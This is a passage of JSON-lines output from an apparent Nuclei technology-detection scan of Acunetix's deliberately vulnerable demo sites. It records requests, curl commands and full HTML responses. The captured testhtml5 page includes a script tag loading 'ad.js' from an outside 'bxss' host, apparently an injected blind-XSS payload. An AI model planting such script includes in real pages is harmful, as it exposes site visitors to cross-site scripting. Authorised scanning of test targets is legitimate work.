src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:37.650313557Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angularjs\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:40.877708941Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"microsoft-asp.net\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(29) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca 